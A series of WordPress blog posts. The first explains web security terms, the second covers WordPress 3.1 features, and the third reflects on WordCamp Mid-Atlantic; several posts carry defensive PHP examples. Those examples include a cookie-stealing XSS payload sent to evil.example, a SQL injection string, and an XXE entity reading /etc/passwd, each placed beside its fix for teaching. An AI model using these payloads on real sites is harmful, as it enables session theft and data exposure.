INFOSEC 101: Breaking Down Scary Terms and What They Mean

I am not a hacker. But I understand the information security world. It’s a scary place, unfortunately, to people who have no exposure to it. Yesterday, WordPress 3.0.4 was released as a critical release… and it was. Matt explained the reason for the release in this way:

Version 3.0.4 of WordPress…is a very important update to apply to your sites as soon as possible because it fixes a core security bug in our HTML sanitation library, called KSES. I would rate this release as “critical.”

Simple enough. He goes on to refer to the vulnerability as an XSS vulnerability which caused a bit of angst on Twitter about what that means and if non-technical users should be given more information due to the terminology.

So, as a public service, I give you some basic definitions and concepts of web security and what we mean. These concepts are rightly scary, but the names tend to be scarier to those who don’t understand them.

XSS

XSS means cross-site scripting. A cross-site scripting attack happens when attacker-supplied input (a URL parameter, a form field, a comment, a post body) is placed into a page without being properly sanitized or encoded, so the visitor's browser treats it as HTML or JavaScript rather than as plain text. The injected code then runs in the visitor's browser with the site's own privileges: it can redirect every visitor somewhere else, steal session cookies, or insert hidden HTML such as spam links that diminish the site's Google search results. The WordPress 3.0.4 fix was in KSES, the library that strips disallowed tags and attributes from submitted HTML before it is stored, which is exactly this class of problem.

Most XSS payloads are JavaScript, but the root cause is unescaped output, not JavaScript itself. WordPress has an escaping API (esc_html(), esc_attr(), esc_url(), esc_js(), and wp_kses() for content that is allowed to contain some HTML) that encodes the characters an attacker needs, such as <, >, " and ', for the context where the data is printed, and all plugin and theme developers are encouraged to run every value they output through these functions. [Docs]
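The following is an added example, not from the original post and not WordPress core code, showing the vulnerable and the escaped version of the same output side by side. It runs in plain PHP: the function_exists() stand-ins approximate esc_html(), esc_attr() and esc_url() only so the file works outside WordPress (inside WordPress the real functions are used, and the real esc_url() likewise drops URLs whose scheme is not on its allowed list). The attacker input is constructed for the example.

```php
<?php
// Added example (not WordPress core code): the difference between echoing
// untrusted input raw and escaping it for the context it lands in.
// esc_html()/esc_attr()/esc_url() are the real WordPress helpers; the
// function_exists() stand-ins below only let this file run outside WordPress.

if ( ! function_exists( 'esc_html' ) ) {
    function esc_html( $text ) {
        return htmlspecialchars( $text, ENT_QUOTES, 'UTF-8' );
    }
}
if ( ! function_exists( 'esc_attr' ) ) {
    function esc_attr( $text ) {
        return htmlspecialchars( $text, ENT_QUOTES, 'UTF-8' );
    }
}
if ( ! function_exists( 'esc_url' ) ) {
    function esc_url( $url ) {
        // Stand-in: only allow http(s) links. WordPress's esc_url() accepts a
        // longer allow-list of schemes but also returns '' for javascript:.
        return preg_match( '#^https?://#i', $url ) ? htmlspecialchars( $url, ENT_QUOTES, 'UTF-8' ) : '';
    }
}

// Constructed attacker input, the kind of thing a comment form receives:
// a display name carrying a script tag and a "website" that is a javascript: URL.
$name = '<script>document.location="http://evil.example/?c="+document.cookie</script>';
$site = 'javascript:alert(document.domain)';

// Vulnerable: the browser sees the script tag and runs it, and the link
// executes script when clicked. Stored or reflected XSS depending on where
// $name came from.
function render_unsafe( $name, $site ) {
    return '<a href="' . $site . '">' . $name . '</a>';
}

// Hardened: encode for the exact context. The text node gets esc_html(),
// the URL gets esc_url() (which also validates the scheme), and any other
// attribute value would get esc_attr().
function render_safe( $name, $site ) {
    return '<a href="' . esc_url( $site ) . '">' . esc_html( $name ) . '</a>';
}

echo render_unsafe( $name, $site ), "\n";
echo render_safe( $name, $site ), "\n";
```

The escaped version still shows the visitor the literal text the attacker typed; it just never lets the browser interpret it. The choice of function depends on where the value lands (text, attribute, URL, inline script), which is why there is more than one of them.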

CSRF

CSRF means Cross-Site Request Forgery. In a CSRF attack, a user's browser is tricked into sending a request to a site where the user is already logged in, without the user intending it. The site cannot tell the difference: the browser attaches the user's session cookie to every request it makes to that site, so the forged request arrives with the same trust the user's own clicks get. A malicious page can trigger it with nothing more than an image tag or an auto-submitting form whose target is the victim site's URL.

A simple example (which does not actually exist in WordPress) would be an authenticated user with admin privileges being tricked into clicking a link (as the authenticated user), after which admin privileges are transferred to the attacker. We've seen this kind of attack on Facebook and Twitter before, where DMs or messages spread themselves across Facebook walls or via Twitter DM. WordPress defends against this with nonces: a token tied to the user and the specific action, which a request forged from another site cannot supply.
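Here is how that trust problem is handled in WordPress plugin code, as an added example that is not part of the original post and not core code. It needs a WordPress install to run; the action name example_delete_item, the option it deletes and the form are hypothetical, while the admin_post_* hook, check_admin_referer(), wp_nonce_field(), current_user_can() and submit_button() are real WordPress functions. A handler that only checks is_user_logged_in() and skips the nonce is exactly the CSRF-able case: any page the admin happens to visit could submit this form on their behalf.

```php
<?php
/*
Plugin Name: CSRF-safe delete example
Description: Added example (not WordPress core): a privileged action protected by a nonce and a capability check.
*/

// Hypothetical action name; the 'admin_post_{action}' hook is real and runs
// for requests to wp-admin/admin-post.php?action=example_delete_item.
add_action( 'admin_post_example_delete_item', 'example_delete_item_handler' );

function example_delete_item_handler() {
    $item_id = isset( $_REQUEST['item_id'] ) ? absint( $_REQUEST['item_id'] ) : 0;

    // 1. Authorization: is this user allowed to do this at all? Being logged
    //    in is not enough; a subscriber must not reach the delete path.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'You are not allowed to do that.', '', array( 'response' => 403 ) );
    }

    // 2. Intent: did the request come from our own form, or from a page the
    //    attacker controls? check_admin_referer() verifies the nonce field
    //    and calls wp_die() if it is missing or wrong. Tying the action name
    //    to the item id means a nonce obtained for item 5 cannot delete item 6.
    check_admin_referer( 'example_delete_item_' . $item_id );

    // The actual work (hypothetical storage: one option per item).
    delete_option( 'example_item_' . $item_id );

    wp_safe_redirect( admin_url( 'options-general.php?deleted=1' ) );
    exit;
}

// The form that issues the request. The hidden nonce field is what an
// attacker's auto-submitting form cannot forge: wp_create_nonce() derives
// the value from the action, the logged-in user's id and a time window,
// using the site's secret keys.
function example_delete_item_form( $item_id ) {
    $item_id = absint( $item_id );
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'admin-post.php' ) ); ?>">
        <input type="hidden" name="action" value="example_delete_item" />
        <input type="hidden" name="item_id" value="<?php echo esc_attr( $item_id ); ?>" />
        <?php wp_nonce_field( 'example_delete_item_' . $item_id ); ?>
        <?php submit_button( 'Delete item' ); ?>
    </form>
    <?php
}
```

Both checks are needed: the capability check answers "may this user do this?", the nonce answers "did this user actually ask for it?". Using POST rather than GET for state-changing actions is the third habit that makes the forged-image-tag variant impossible.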

SQL Injection

SQL injection is an attack in which untrusted input is concatenated into a database query, so that the attacker's text is parsed as part of the SQL itself. The attacker can then read data they should not see, alter or delete rows, or in some configurations drop the database altogether. You see fewer of these in WordPress and Drupal sites because the platforms provide database APIs that keep the query separate from the data. In WordPress that is $wpdb->prepare(), which takes %s and %d placeholders and escapes the values supplied for them. The caveat is that prepare() only protects values passed through placeholders: a plugin that builds its own query string by concatenation is just as injectable as it ever was.
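The following is an added example, not WordPress code, that runs the same user lookup both ways against a throwaway in-memory SQLite database so it can be executed anywhere PHP has PDO. The table and rows are constructed for the example; the $wpdb->prepare() form in the comment is the WordPress equivalent of the prepared statement.

```php
<?php
// Added example, not WordPress code: the same lookup built by string
// concatenation and with a prepared statement, run against an in-memory
// SQLite database.

function make_db() {
    $db = new PDO( 'sqlite::memory:' );
    $db->setAttribute( PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION );
    $db->exec( 'CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_email TEXT)' );
    // Constructed sample rows.
    $db->exec( "INSERT INTO wp_users VALUES (1, 'admin', 'admin@example.com')" );
    $db->exec( "INSERT INTO wp_users VALUES (2, 'bob', 'bob@example.com')" );
    return $db;
}

// Vulnerable: the login is pasted straight into the SQL text, so a quote
// in the input ends the string literal and the rest becomes SQL.
function find_user_unsafe( PDO $db, $login ) {
    $sql = "SELECT ID, user_login FROM wp_users WHERE user_login = '" . $login . "'";
    return $db->query( $sql )->fetchAll( PDO::FETCH_ASSOC );
}

// Hardened: the query shape is fixed and the value travels separately.
// The WordPress equivalent is
//   $wpdb->get_results( $wpdb->prepare(
//       "SELECT ID, user_login FROM $wpdb->users WHERE user_login = %s", $login ) );
// where %s is escaped and quoted by prepare(); %d is used for integers.
function find_user_safe( PDO $db, $login ) {
    $stmt = $db->prepare( 'SELECT ID, user_login FROM wp_users WHERE user_login = ?' );
    $stmt->execute( array( $login ) );
    return $stmt->fetchAll( PDO::FETCH_ASSOC );
}

$db = make_db();

// A classic payload: closes the string and adds a condition that is always true.
$payload = "nobody' OR '1'='1";

print_r( find_user_unsafe( $db, $payload ) );
print_r( find_user_safe( $db, $payload ) );
```

The unsafe call returns every row in the table, because the WHERE clause has become `user_login = 'nobody' OR '1'='1'`; the safe call returns an empty array, because no user has the literal login "nobody' OR '1'='1". The same payload in a DELETE or UPDATE statement is how the "alter or delete a database" outcome happens.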

0Day Vulnerabilities

0Day (that is a zero, not the letter O) is a vulnerability that is being exploited, or is publicly known, before the developer has a fix for it. The name comes from counting the days a vendor has had to respond: with a 0-day, that number is zero. Many security researchers instead practice coordinated disclosure: they alert the developers privately to a newly discovered vulnerability, work with them to close the hole, and only then disclose it publicly.

Denial of Service/(D)DoS

(D)DoS is a (Distributed) Denial of Service attack. These attacks work by flooding a site with more traffic or requests than it can serve (or by hammering a request that is expensive to handle) until legitimate visitors can no longer get through. If the attack comes from a single source it's a DoS; if it is spread across many machines, typically a botnet, it's a DDoS.

Obviously, there are many aspects of security. We could go way complicated on terminology and concepts, but these are some of the basics you should know when you see something about a vulnerability.

Photo Credit: heathbrandon

10 Things You Need to Know About WordPress 3.1

Happy New Year, everyone. WordPress development on version 3.1 is wrapping up (Currently it’s in Release Candidate and should be released early in 2011)…. which means, it’s time for another edition of our 10 Things You Need to Know About posts.

This is a bigger release than was originally planned. It was supposed to stay small and set the stage for a larger WordPress 3.2 release later in the year. That release will require PHP 5.2 (make sure your host supports it now; we do at WP Engine). WP 3.1 did turn into a larger release than expected, but I think you'll be happy. So, without further ado.

Network Admin

If you're running WordPress in Multisite mode, or have used WordPress MU for a while, you may be alarmed by the conspicuous lack of the Site Admin/Super Admin menu that used to sit at the top of the Admin menu. Never fear: though it looks like it has gone the way of the dodo, it has in fact been relocated into a separate dashboard area, accessible from the new "Network Admin" link in the top right of the WordPress Admin. When you click that link, you are taken to a new dashboard for Network management (and the link then changes to Site Admin to allow quick access back into the normal WordPress admin). Also note that, like the previous Super Admin menu, this link is only shown to users who have been designated as Super Admins; the network admin screens check for Super Admin rights themselves, so the hidden link is a convenience, not the access control. This change separates content production from administration and allows blogs (Sites) to be managed individually and the Network to be managed separately.

Post Formats

Perhaps one of the most talked about features in WordPress 3.1 is post formats. Post formats have been implemented in a variety of ways for years. The idea that some content is different (and should be rendered differently as a result) goes way back. A prime example of this was the concept of "Asides": little blurbs that were often simply links or short posts that were off topic, not really worth a full blog post or whatever. Now, with a bit of code in a theme's functions.php, you can enable any of nine formats: aside, chat, gallery, link, image, quote, status, video, or audio.

In this paradigm, theme developers can target specific CSS and layout structure to each of these post formats. This enables rich user experience and high quality layout without prejudice toward the most common type of content… text. If you aren’t sure what each of these types of content are, I refer you to the Post Formats section of the Codex which has a list.

In order to enable a theme with one or more of these formats, add the following line to the theme functions.php file:

add_theme_support( 'post-formats', array( 'aside', 'gallery' ) );

This line enables new UI in the post edit screen that allows you to designate a post with a specified format. For a thorough write-up on this new feature, go read the post format reference from my friend Lisa Sabin-Wilson.

Internal Linking

Have you ever gone through the torturous process of adding links to your own site to a post you’re writing? You have to go find that post from a different tab or window, usually via search or scrolling through potentially pages of content to find exactly what you want? Yeah? Me too. As a result, WordPress has added Internal Linking as a feature to WordPress 3.1.

This feature, only available when using the Visual Text Editor, allows you to add a link as you always have, or choose from already existing content on the same site. Yeah… that easy. Simply click the typical link button, then click on the arrow to expand the "Link to Existing Content" section of the pop-up window. Pretty neat!

Import Overhaul

In advance of WordPress 3.2 and its PHP 5 dependence, we see yet another improvement that rewards WordPress users whose hosts run PHP 5. The import routine has been rewritten from the ground up with efficiency in mind. The old importer used regular expressions to parse the WordPress export file (XML), which caused serious performance problems on large exports.

Now, using native XML parsers, the WordPress import can process files much more efficiently. Similar to the filesystem transport API used by the one-click installer and upgrade routines, WordPress runs through a series of checks to find the best XML parser available on the server, a progressive enhancement that rewards PHP 5. The first check is for SimpleXML (PHP 5 only), followed by XML Parser (the expat-based extension available in PHP 4), and if neither of those is enabled it falls back on the old regex parsing. One caveat for anyone who imports export files produced by other people: a real XML parser honors things the regex never did, such as DOCTYPE entity declarations, so the file being imported should be treated as untrusted input and parsed with entity expansion and network access disabled.
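The following is an added example, not the WordPress importer's own code, of parsing a WXR-style export with SimpleXML while refusing the things that make XML parsing dangerous. It runs in plain PHP; both XML documents are constructed for the example, and the hostile one shows the external-entity trick the parser must not honor.

```php
<?php
// Added example, not the WordPress importer's code: parse a WXR-style export
// with SimpleXML while refusing DOCTYPE declarations (entity expansion,
// external entity reads) and network fetches during parsing.

function parse_export_titles( $xml ) {
    // A WordPress export never carries a DOCTYPE, so reject any that does
    // rather than trusting the parser to ignore its entities.
    if ( preg_match( '/<!DOCTYPE/i', $xml ) ) {
        return array( 'error' => 'DOCTYPE not allowed in import file' );
    }

    $prev_loader = null;
    if ( PHP_VERSION_ID < 80000 ) {
        // Older PHP: stop libxml from resolving external entities at all.
        // PHP 8 disables external entity loading by default and deprecates
        // this call, hence the version guard.
        $prev_loader = libxml_disable_entity_loader( true );
    }
    $prev_errors = libxml_use_internal_errors( true );

    // LIBXML_NONET forbids network access while parsing. LIBXML_NOENT is
    // deliberately not set, so entities are never substituted.
    $doc = simplexml_load_string( $xml, 'SimpleXMLElement', LIBXML_NONET | LIBXML_NOCDATA );

    $errors = libxml_get_errors();
    libxml_clear_errors();
    libxml_use_internal_errors( $prev_errors );
    if ( null !== $prev_loader ) {
        libxml_disable_entity_loader( $prev_loader );
    }

    if ( false === $doc ) {
        $msg = $errors ? trim( $errors[0]->message ) : 'unknown';
        return array( 'error' => 'malformed XML: ' . $msg );
    }

    $titles = array();
    foreach ( $doc->channel->item as $item ) {
        $titles[] = (string) $item->title;
    }
    return array( 'titles' => $titles );
}

// Constructed sample: a minimal WXR-shaped document with two posts.
$good = <<<XML
<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:wp="http://wordpress.org/export/1.1/">
 <channel>
  <title>Example blog</title>
  <item><title>Hello world</title><wp:post_id>1</wp:post_id></item>
  <item><title>Second post</title><wp:post_id>2</wp:post_id></item>
 </channel>
</rss>
XML;

// Constructed hostile sample: tries to read a server file through an entity.
$bad = <<<XML
<?xml version="1.0"?>
<!DOCTYPE rss [ <!ENTITY leak SYSTEM "file:///etc/passwd"> ]>
<rss><channel><item><title>&leak;</title></item></channel></rss>
XML;

print_r( parse_export_titles( $good ) );
print_r( parse_export_titles( $bad ) );
```

The DOCTYPE check up front is the cheap, parser-independent defense; the libxml settings are the belt to its braces, and they matter just as much for the DOMDocument and XML Parser paths as for SimpleXML.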

Editorial Comment: I was hoping for a rewrite for 3.2 to both the exporter and importer that would handle everything in JSON (a much more lightweight plain text file format), perhaps optionally, instead of XML. XML parsing by nature, regardless of SimpleXML or XML Parser, is quite expensive in terms of CPU cycles and efficiency.

Theme Filter

WordPress.com users are probably familiar with the theme filter that those bloggers have had access to. With Theme Filters, users are able to quickly drill down on possible themes to install and use based on criteria such as number of columns, features, etc. To access this, simply click on the Feature Filter on the right side of the themes page to display all the options that are available. Note for Theme Developers: In order to make this useful for bloggers, please ensure that your theme style sheet headers include a Tags header similar to this:

Tags: white, yellow, light, one-column, two-columns, fixed-width, custom-colors, custom-header, custom-background

Advanced Taxonomy and Postmeta Queries

WordPress wouldn't be complete without enhancements for developers as well. In WordPress 3.1, developers have access to powerful new features that provide for robust querying of both taxonomies and postmeta. In previous iterations, developers could only target posts with WP_Query (or the Loop) by a single meta_key=foo and/or meta_value=bar pair.

The problem was that more granular targeting (for instance, only posts that have meta_key foo above some numeric value AND meta_key foo2 set to one of several values) was not possible in a single query. Now it is. Replace meta_key and meta_value with meta_query and feed it an array of arrays, each containing any of key, value, compare (comparison operator) and type (data type used for the comparison). Each clause narrows the result set further.

$query = new WP_Query( array(
    'meta_query' => array(
        array(
            'key'     => 'foo',
            'value'   => 123,
            'compare' => '>=',
            'type'    => 'numeric'
        ),
        array(
            'key'     => 'foo2',
            'value'   => array( 'bar2', 'bar3' ),
            'compare' => 'IN',
        ),
    )
) );

The same can be done with taxonomy queries. Instead of meta_query, however, use tax_query and instead of key, value, compare and type you would use taxonomy, terms, field and operator. Otto has a good explanation for that on his site.
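As an added example (not from the original post or from Otto's), here is one WP_Query that combines a meta_query with a tax_query, which is the usual real-world shape. It needs a WordPress install to run; the meta keys, the "region" taxonomy and its term slugs are hypothetical, while WP_Query, meta_query, tax_query and wp_reset_postdata() are real 3.1 APIs.

```php
<?php
// Added example (not from the original post): one WP_Query that combines a
// meta_query and a tax_query. Meta keys, taxonomy and term slugs are
// hypothetical; the query arguments are real WordPress 3.1 options.
function example_find_events() {
    $query = new WP_Query( array(
        'post_type'      => 'post',
        'posts_per_page' => 10,
        // Both meta clauses must match.
        'meta_query'     => array(
            array(
                'key'     => 'event_capacity',
                'value'   => 50,
                'compare' => '>=',
                'type'    => 'numeric',
            ),
            array(
                'key'     => 'event_status',
                'value'   => array( 'open', 'waitlist' ),
                'compare' => 'IN',
            ),
        ),
        // Only posts filed under either term of the hypothetical "region" taxonomy.
        'tax_query'      => array(
            array(
                'taxonomy' => 'region',
                'field'    => 'slug',
                'terms'    => array( 'baltimore', 'washington' ),
                'operator' => 'IN',
            ),
        ),
    ) );

    $titles = array();
    while ( $query->have_posts() ) {
        $query->the_post();
        $titles[] = get_the_title();
    }
    // A secondary query must hand the global post back to the main loop.
    wp_reset_postdata();
    return $titles;
}
```

WordPress builds and escapes the SQL for these arrays itself, so there is nothing to escape by hand; what you still own is validating any user-supplied piece (casting a threshold to an integer, checking a slug against a known list) so the query means what you intended.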

User Queries Overhauled and Simplified

Anyone who has done plugin development that needed access to users has dealt with a hodgepodge of functions like get_userdatabylogin(), get_user_by_email(), etc. Not a lot of consistency, and definitely something that required frequent referencing of code. Now, from the "Duh! Why didn't I think of that?" file, comes the get_users() function, which simplifies that API. It wraps a more powerful class for user search and querying called WP_User_Query.

To leverage this new API, you simply pass an array of arguments to get_users() and it returns an array of user objects for the matching records. Arguments in the passed array can be:

  • blog_id – defaults to the ID of the current blog (always 1 in standard mode, but possibly another number in Multisite mode).
  • role – administrator, editor, author, contributor or subscriber (or any custom role). Defaults to nothing.
  • meta_key, meta_value, meta_compare – filter on usermeta, the same way the WP_Query arguments of the same names work. Default to nothing.
  • include – an array of user IDs to restrict the query to. If empty, all users are searched. By default, it's empty.
  • exclude – similar to include, an array of user IDs to leave out. By default, it's empty.
  • search – a search string. A leading or trailing * is a wildcard, so *max* matches any login or nicename containing "max"; without wildcards the match is exact. Which columns are searched depends on the string (something containing @ is matched against user_email, a number against ID and user_login, a URL against user_url, anything else against user_login and user_nicename). By default, it's empty.
  • orderby – which column the results are sorted on. Defaults to 'login', which designates the user_login column.
  • order – ASC or DESC. Defaults to ASC.
  • offset – number of records to skip in the resulting dataset. If set to 1, the first record is skipped and results begin with the second. Empty by default.
  • number – how many records to return. Empty (no limit) by default.
  • count_total – if true, the total number of matching records (ignoring number and offset) is also computed, and is available from WP_User_Query's get_total() method. Defaults to true.
  • fields – which columns to return: 'all' (the default) for full user objects, 'ID' for just the IDs, or an array of column names.
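The following is an added example, not from the original post, that puts the API to a use a site owner should actually run now and then: listing and counting the accounts that hold the administrator role. It needs a WordPress install; get_users(), WP_User_Query and get_total() are real 3.1 APIs, and the function names are hypothetical.

```php
<?php
// Added example (not from the original post): an audit of administrator
// accounts using get_users() and WP_User_Query.
function example_audit_admins( $search = '' ) {
    $args = array(
        'role'    => 'administrator',
        'orderby' => 'login',
        'order'   => 'ASC',
        'number'  => 50,
    );
    if ( '' !== $search ) {
        // Leading and trailing * are wildcards; without them the match is exact.
        $args['search'] = '*' . $search . '*';
    }

    $report = array();
    foreach ( get_users( $args ) as $admin ) {
        $report[] = array(
            'id'         => $admin->ID,
            'login'      => $admin->user_login,
            'email'      => $admin->user_email,
            'registered' => $admin->user_registered,
        );
    }
    return $report;
}

// WP_User_Query directly when only the total is wanted: fetch one ID but
// ask for the count, which ignores 'number', so a site that suddenly has
// more administrators than it should stands out without paging through them.
function example_count_admins() {
    $q = new WP_User_Query( array(
        'role'        => 'administrator',
        'number'      => 1,
        'count_total' => true,
        'fields'      => 'ID',
    ) );
    return $q->get_total();
}
```

Comparing the output of example_audit_admins() against the list of people who are supposed to have that role is a five-minute check that catches the "mystery admin" left behind by a compromised plugin or a departed contractor.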

Admin Bar

For those of you who have been WordPress.com or BuddyPress users, you'll be familiar with the admin bar. The Admin Bar is a toolbar that goes across the top of the site and gives users quick access to other parts of their blogs. That Admin Bar has now been brought to WordPress 3.1 as a user setting, so it can be turned on or off based on preference in your user profile.

In Multisite, the default is to show the admin bar in both the wp-admin as well as on the front end. In standard mode, the admin bar is set to only display on the front end by default. The Admin Bar, by default, provides quick access to a User menu providing a quick link to the user profile as well as the dashboard and the ability to logout. There is also a My Sites drop down menu available in Multisite that allows users quick access to blogs they have access to. There is also Admin Bar access to other frequently used areas of the blog and plenty of hooks and filters for plugin developers to add additional access.

Improvements to Custom Post Types

In WordPress 3.0, custom post types were introduced, and now they have been iterated on. In WordPress 3.0, when a custom post type was declared, a standard set of UI was added to the admin menu. This UI consisted of an edit menu (called Posts for the standard Posts UI), Add New and, if custom taxonomies were assigned, Categories and Tags (or whatever those taxonomies were designated as).

Now, developers can add a show_in_menu argument when registering a post type, and designate which menu to display limited UI in. This allows for custom post types to be used with the flexibility of eliminating potentially unwanted UI that would clutter the menu. Andrew Nacin has a great writeup on admin menu changes with post types that is worth the read for any developer working in this area.

Related, when declaring a post type, you have traditionally had to pass an array of labels that designate a singular version of a name (i.e. Post vs Posts) as well as a common name (i.e. Posts). You can now add menu_name to that list of labels if you want to target a specific way of displaying the post type in the admin menu.

Finally, theme developers can now create template files named archive-{post_type}.php to give a post type its own archive template. For that to work, the post type has to be registered with the new has_archive argument set to true (or to the slug the archive should live at); the archive template is then used whenever is_post_type_archive() is true for that type. Because the template loads even when there are no posts of that type yet, check have_posts() inside it and fall back to some kind of 404-ish or other content if nothing exists.
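As an added example (not from the original post or from Nacin's write-up), here is a post type registered with the 3.1 additions described above, plus the archive template logic that handles the empty case. It needs a WordPress install; the post type name, labels and template function are hypothetical, while the register_post_type() arguments and is_post_type_archive() are real 3.1 APIs.

```php
<?php
// Added example (not from the original post): a custom post type using the
// 3.1 additions. The post type name and labels are hypothetical; the
// arguments are real register_post_type() options.
function example_register_report_type() {
    register_post_type( 'example_report', array(
        'labels' => array(
            'name'          => 'Reports',
            'singular_name' => 'Report',
            'menu_name'     => 'Audit Reports', // new in 3.1: overrides the menu label
        ),
        'public'          => true,
        // New in 3.1: tuck the UI under an existing menu (here Tools) instead
        // of adding a new top-level entry; true would give a top-level menu.
        'show_in_menu'    => 'tools.php',
        // New in 3.1: enables /example_report/ and archive-example_report.php.
        'has_archive'     => true,
        // Inherit the post capabilities rather than inventing unchecked ones.
        'capability_type' => 'post',
        'supports'        => array( 'title', 'editor', 'author' ),
    ) );
}
add_action( 'init', 'example_register_report_type' );

// Body of archive-example_report.php (assumed file). The template is chosen
// whenever is_post_type_archive( 'example_report' ) is true, including when
// no reports exist yet, so the empty case is handled explicitly.
function example_render_report_archive() {
    if ( ! have_posts() ) {
        echo '<h1>Reports</h1><p>No reports have been published yet.</p>';
        return;
    }
    echo '<h1>' . esc_html( post_type_archive_title( '', false ) ) . '</h1>';
    while ( have_posts() ) {
        the_post();
        echo '<h2><a href="' . esc_url( get_permalink() ) . '">' . esc_html( get_the_title() ) . '</a></h2>';
    }
}
```

Note that post_type_archive_title() is also new in 3.1; passing false as its second argument returns the title instead of echoing it, which is what lets it be escaped on the way out.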

Filterable Template Hierarchy

Speaking of template files, it’s now possible to designate different template file orders and hierarchy depending on need. The original ticket, patches and ultimate core addition, uses the following example:

Take the author template hierarchy: author-{nicename}.php > author-{id}.php > author.php

Say I want to add author-{role}.php before author.php.

With an ‘author_template_candidates’ hook, I could manipulate the actual hierarchy.

What shipped in 3.1 is a little different from the proposed '_template_candidates' hook: get_query_template() now takes the array of candidate files, and the path it settles on is passed through the '{$type}_template' filter (for the author example, 'author_template'), which receives the template locate_template() picked and can return a different one. A developer can therefore insert author-{login}.php or author-{role}.php before author.php by hooking that filter, checking which file core chose, and substituting their own. A '{$type}_template_hierarchy' filter that operates on the candidate list itself did not arrive until a later release. Still pretty neat!
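The following is an added example, not the ticket's or core's code, of doing exactly that for author-{role}.php. It needs a WordPress install; the 'author_template' filter, get_query_var(), WP_User and locate_template() are real 3.1 APIs, and the function name is hypothetical.

```php
<?php
// Added example (not the ticket's or core's code): insert author-{role}.php
// ahead of author.php by hooking the 'author_template' filter, which
// receives the path locate_template() picked for an author archive.
function example_author_role_template( $template ) {
    $author_id = (int) get_query_var( 'author' );
    if ( $author_id <= 0 ) {
        return $template;
    }
    $user = new WP_User( $author_id );
    if ( empty( $user->roles ) ) {
        return $template;
    }
    // Role names come from the database, but nothing that could carry
    // user-influenced text should choose a file path without its characters
    // being whitelisted first.
    $role = preg_replace( '/[^a-z0-9_-]/', '', strtolower( reset( $user->roles ) ) );
    if ( '' === $role ) {
        return $template;
    }
    // locate_template() only looks inside the child and parent theme
    // directories, so even a bad value cannot reach outside the theme.
    $role_template = locate_template( array( "author-{$role}.php" ) );
    // Only override when core fell through to the generic author.php, so
    // author-{nicename}.php and author-{id}.php keep their higher priority.
    if ( $role_template && 'author.php' === basename( $template ) ) {
        return $role_template;
    }
    return $template;
}
add_filter( 'author_template', 'example_author_role_template' );
```

The same pattern works for any of the get_*_template() functions: hook '{$type}_template', inspect the basename core chose, and substitute only in the case you mean to change.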

Conclusion

While WordPress 3.1 is not the biggest release in the history of WordPress major releases, it does add quite a few new toys for bloggers as well as developers. Remember when upgrading that you should, if you can, test your site in a development area before doing the upgrade. Plugins should most likely work, but you never know. And if something is broken, you can email me at aaron@technosailor.com and, for a fee, I may be able to help you out.

Finally, the second edition of the WordPress Bible will be out sometime this spring and it does, in fact, cover WordPress 3.1. However, the 1st edition is available now and is a great resource if you’re trying to get under the hood. You can buy that today on Amazon.

Credit: Andrew Nacin (@nacin), a Core WordPress Developer, slapped me with a trout several times during the course of writing this article. While I take credit for the article, any inaccuracies are entirely his fault. ;-) #blamenacin

WordCamp Mid-Atlantic: Where It’s Been, Where It’s Going

Late in 2008, while I was transitioning from life in Baltimore to life outside of Washington, D.C., I was contemplating organizing the first WordCamp event in that area. Baltimore had begun to show signs of a healthy tech community and Washington had continued to flourish as a healthy communications scene. Philadelphia, just up I-95, had a healthy design and development community and I had become somewhat familiar with that city as well.

I made a point of making my event one that would set trends and challenge the status quo.

Mid-Atlantic

One thing I did think of early on was that I detested the trend that identified an event with a singular city, especially when there were multiple cities, all offering different, yet complementary modus operandi. I bucked the trend of identifying the event by a city, eschewing names like WordCamp DC or WordCamp Baltimore. These names, while celebratory of the city that hosts them, inherently bear the problem of inferred exclusivity.

From the very first WordCamp in the region, I challenged that designation and attempted to bring the cities together. It was called WordCamp Mid-Atlantic.

Three Cities, then Two

The original plan was to bring the three cities together in Baltimore for a WordPress event. Ideally, the result would be more collaboration and resources shared between the various communities. Ultimately, Philadelphia never bought into Mid-Atlantic (and in fact ended up with their own successful WordCamp Philly). However, Mid-Atlantic was wildly supported by both Baltimore and DC, even garnering coverage in the Baltimore Sun business publication Maryland Daily Record.

For WordCamp Mid-Atlantic 2010, the event was geared mainly to the Washington Metro and Baltimore.

Keynotes That Challenge

In both events, I wanted to bring in someone from the WordPress leadership hierarchy as a keynote as well as someone from outside of WordPress entirely to challenge the gathered attendees. This was quite controversial, actually. In 2009, I brought in Anil Dash, founder and former SVP at SixApart. Anil was known historically as somewhat of an antagonist, but did a wonderful job in sharing and illustrating the similarities between WordPress and SixApart, who provided a competing platform. His message was one of learning from each other.

This past year, I opted to bring in Marco Tabini, who has also been a frequent antagonist of WordPress. His message was one from the perspective of the PHP community and reconciling how the PHP core people could learn from and help the WordPress core people, and vice versa. My inbox became a little tense in the weeks leading up to the event due to other incidents involving dissenting views about the GPL license and WordPress' interpretation of it. Needless to say, Marco did an amazing job.

It’s Not My Baby

As most of you know, I have left the Baltimore/Washington region. As a result, this past WordCamp Mid-Atlantic was my last. People have asked me quite a lot about who I would pass the baton to. This is a tricky question because the event is not mine. It’s yours.

That said, this is not for just anyone to run. I cannot put any strings on who will run the next event but I do have the platform to voice my sentiments:

  • I want to see Mid-Atlantic stay in the event. I do not want to see a fractured event where there becomes a WordCamp Baltimore and a WordCamp DC. Both cities have user groups that meet frequently. I want to see the WordCamp Mid-Atlantic event retain its place as a regional/local event.
  • I want to see the idea of challenging (and even dissenting) opinions welcomed to the stage, like Marco… and Anil. We should not be scared of being shaken up. We should embrace it and learn from it. That said, future organizers should be sensitive as to who you have come and speak.
  • Retain the unconference. One of the amazing success stories of WordCamp Mid-Atlantic 2010 was the unconference, organized by Steve Fisher. Besides the pre-scheduled and organized tracks that are familiar to conference goers, we provided a separate, yet equal unconference for ad-hoc discussion and talks. The only thing I’d change is to make it true barcamp style and make a no-powerpoint rule.
  • No one organizer. I became the de facto organizer for both events. While I had varying degrees of help for both, I really became the guy for the event. This was not wise on my part. There should be an organizer in each city.

This is Baltimore’s event. This is Washington’s event. This event brilliantly integrated both communities. It really, really did. I want to see it continue (obviously with new leadership), but I want it to be with people who take it seriously and can make it better than it ever was. Put your own spin on it. Make it your own, not mine.

Back in Startup Mode… Announcing WP Engine!

